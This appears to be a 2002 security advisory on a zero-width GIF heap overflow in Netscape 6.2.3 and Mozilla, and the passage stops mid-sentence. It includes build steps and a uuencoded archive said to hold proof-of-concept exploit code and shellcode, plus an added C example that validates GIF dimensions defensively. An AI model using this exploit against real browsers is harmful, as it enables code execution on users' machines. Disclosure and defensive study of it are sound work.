COMMAND

    Mozilla/Netscape zero width GIF buffer overflow

SYSTEMS AFFECTED

    Netscape 6.2.3
    Mozilla 1.0?

PROBLEM

    zen-parse [zen-parse@gmx.net] says :

    Zero width GIF file can cause exploitable heap corruption.
    (Or: "Why not to use a graphical browser")

    Vendor contacted: 17 Jul 2002
    Internally patched: 19 Jul 2002 (according to changelog)
    Received notification of patch: 29 Aug 2002 (via email)

    http://crash.ihug.co.nz/~Sneuro/zerogif/

    Contains an example exploit for malformed GIFs under Netscape 6.2.3.
    Also affects a number of other browsers, including Mozilla (of course)
    and manages to kill Opera.

    Example exploit (when it works properly) should create ~/.mashrc with a
    sample replacement for ~/.bashrc. Certain values in 'generic.c' and
    possibly other files will need changing depending on library addresses.

    Comments in pngshellcode.c are related to another exploit for Netscape
    6.2.3... once I found one way to get data into known locations, I kept
    it.

    Certain utilities (pnmtopng and ppmtogif) called by these programs are
    in the netpbm-progs package.

        $ make pngshellcode; ./pngshellcode
        $ make create; ./create
        $ make generic; ./generic

    These commands will make the shellcode and the gif file.

    This exploit is extremely "Proof of Concept" code. Sorry about the
    system() calls.
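The trigger the advisory describes is an Image Descriptor whose width field is 0. The program below is an added example, not code from zen-parse's archive and not the Mozilla/Netscape GIF decoder: it builds a minimal GIF89a with a zero-width frame (a constructed sample), parses it with a small stand-in decoder front end, and shows the dimension and overflow checks that belong before a pixel buffer is sized. `gif_first_frame`, `frame_buffer_size` and `sample_status` are hypothetical names; the byte layout follows the GIF89a specification. The advisory does not say how Mozilla's decoder corrupted the heap and the example does not claim to reproduce it; it shows the usual precondition, a buffer sized from width * height that comes out to zero while decoded pixel data is still written. The frame-outside-screen check is stricter than many real decoders, which clamp instead of rejecting.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example; not the advisory's code nor Mozilla's decoder. Function and
 * status names are hypothetical; the byte layout follows GIF89a. */
enum gif_status { GIF_OK = 0, GIF_BAD_HEADER, GIF_TRUNCATED,
                  GIF_ZERO_DIMENSION, GIF_FRAME_OUTSIDE_SCREEN };

struct gif_frame {
    uint16_t screen_w, screen_h;        /* Logical Screen Descriptor */
    uint16_t left, top, width, height;  /* Image Descriptor          */
};

/* Constructed sample: 1x1 logical screen, 2-colour global palette, one frame
 * whose Image Descriptor says width = 0, height = 1. Returns bytes written. */
size_t build_zero_width_gif(uint8_t *out, size_t cap)
{
    static const uint8_t img[] = {
        'G', 'I', 'F', '8', '9', 'a',
        0x01, 0x00, 0x01, 0x00,              /* screen 1 x 1 (little-endian)   */
        0x80, 0x00, 0x00,                    /* GCT flag, 2 entries; bg; aspect */
        0x00, 0x00, 0x00, 0xff, 0xff, 0xff,  /* global colour table             */
        0x2C,                                /* Image Descriptor separator      */
        0x00, 0x00, 0x00, 0x00,              /* left, top                       */
        0x00, 0x00, 0x01, 0x00,              /* width = 0, height = 1           */
        0x00,                                /* no local colour table           */
        0x02,                                /* LZW minimum code size           */
        0x02, 0x44, 0x01,                    /* one 2-byte data sub-block       */
        0x00,                                /* block terminator                */
        0x3B                                 /* trailer                         */
    };
    if (cap < sizeof img) return 0;
    memcpy(out, img, sizeof img);
    return sizeof img;
}

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Parses header, Logical Screen Descriptor and optional global colour table,
 * skips extension blocks, then reads and validates the first Image
 * Descriptor. Nothing is allocated until this returns GIF_OK. */
enum gif_status gif_first_frame(const uint8_t *buf, size_t len, struct gif_frame *f)
{
    size_t pos = 13;
    if (len < 13 || (memcmp(buf, "GIF87a", 6) != 0 && memcmp(buf, "GIF89a", 6) != 0))
        return GIF_BAD_HEADER;
    f->screen_w = le16(buf + 6);
    f->screen_h = le16(buf + 8);
    if (buf[10] & 0x80)                         /* global colour table present */
        pos += 3u * (1u << ((buf[10] & 0x07) + 1));
    while (pos < len && buf[pos] == 0x21) {     /* extension: 0x21 label sub-blocks 0x00 */
        pos += 2;
        while (pos < len && buf[pos] != 0) pos += 1u + buf[pos];
        pos += 1;
    }
    if (pos + 10 > len || buf[pos] != 0x2C) return GIF_TRUNCATED;
    f->left   = le16(buf + pos + 1);
    f->top    = le16(buf + pos + 3);
    f->width  = le16(buf + pos + 5);
    f->height = le16(buf + pos + 7);
    if (f->width == 0 || f->height == 0) return GIF_ZERO_DIMENSION;
    if ((uint32_t)f->left + f->width  > f->screen_w ||
        (uint32_t)f->top  + f->height > f->screen_h) return GIF_FRAME_OUTSIDE_SCREEN;
    return GIF_OK;
}

/* Pixel-buffer size for a validated frame. A decoder that computes
 * width * height without this check gets 0 for the sample above, allocates a
 * zero-length buffer, then writes every decoded pixel past its end: the
 * precondition for the heap corruption class the advisory describes. */
int frame_buffer_size(const struct gif_frame *f, size_t *bytes)
{
    if (f->width == 0 || f->height == 0) return 0;
    if ((size_t)f->width > SIZE_MAX / f->height) return 0;  /* multiplication overflow */
    *bytes = (size_t)f->width * f->height;
    return 1;
}

/* Demonstration helper: status of the sample after overwriting its width
 * field (bytes 24-25, little-endian) with `width`. */
enum gif_status sample_status(uint16_t width)
{
    uint8_t buf[64];
    struct gif_frame f;
    size_t n = build_zero_width_gif(buf, sizeof buf);
    buf[24] = (uint8_t)(width & 0xff);
    buf[25] = (uint8_t)(width >> 8);
    return gif_first_frame(buf, n, &f);
}

int main(void)
{
    uint8_t buf[64];
    struct gif_frame f;
    size_t n = build_zero_width_gif(buf, sizeof buf), bytes = 0;
    enum gif_status st = gif_first_frame(buf, n, &f);
    printf("sample: %zu bytes, frame %ux%u on a %ux%u screen, status %d\n", n,
           (unsigned)f.width, (unsigned)f.height, (unsigned)f.screen_w,
           (unsigned)f.screen_h, (int)st);
    printf("naive width*height = %zu; checked size accepted = %d\n",
           (size_t)f.width * f.height, frame_buffer_size(&f, &bytes));
    return st == GIF_OK ? 0 : 1;
}
```

Run as-is and the sample is rejected with GIF_ZERO_DIMENSION before any buffer exists; `sample_status(1)` shows the same file accepted once the width is non-zero and inside the logical screen. The same two checks (no zero dimension, no overflow in the product) apply to any raster decoder that sizes its output from header fields.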
    UUencoded archive :

begin 644 how-it-works.tgz
M'XL(`"HP;ST``^T:_6_;N#4_^Z_@W"4GV8I#?=M-'*P[!(<"=T/1]H=AL5'(
M%&5KE25!DA.YU_SO>X^D)-M)DPW+>MA=&,@2R<?W2;X/MM6*G[+3O,B61;`N
M3^/33<G#LZ-G;90ZU'==>(MV^);?OFO;GDVIY1]1T_:H>43<YV7CX;8IJZ`@
MY*C(LNHQN*?F_T];]:#]6<&#BH_8\]"@)J6>XWS3_I9C']C?M:AS1.CSD'^\
M_<'MOP[B5--[O_9(G%:$G?<(2[*2:Z8.GYLTB=//6G\=Y%&<\%&>K_LXGN4\
MW1\U/->@GD=Q-B\`5:3UWWG$<CUBPJ\[2\7"*"LT-J7G[`)FSMEPJ/<(D&Z7
M'#/\ZQL,_W#!7>^N]UNKZ'?='C[_/&7/=?B/GCS_<-8/_;_C4OOE_'^/UF,K
M$/\V**_GTUY_5O-H5B_XK`["61W"VPQF-:/PJ+=ISFK+FM6V/:L=9U:/Q[/:
M]V>UY\UJU^V_H'A6%.<]],I@G82GX#9[G;<69F/7X$;GU_;\7+GO#0*)SQK>
M>Z[8%,ZX<\4*:5D5\-*@U_CG&G#4%W+ZO!Y.;>6C!<6;:P>)26K9)JV,"'Y#
M018FZ7R*6ZD>TKD<,)L!4PU8S8"E!NRY7!Q'&MM<`G\Z$B,Y+PI@IA\%$&)"
MDJ5`+LD*B#D&X77.6<7#UT(0`OVXD@$+X@610089YPT"#[PNVD1\BW@AAD-R?
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
;F*BX1OJMT_.7]M)>VDO[G[5_`4]DH`P`*```
`
end

    2457 bytes

SOLUTION

    This issue is patched in Netscape 7.0 and the latest version of Mozilla.
    There are a few other exploitable issues patched in Netscape 6.2.3
    relating to other image formats. I expect (hope for?) an advisory from
    Netscape at some point soon for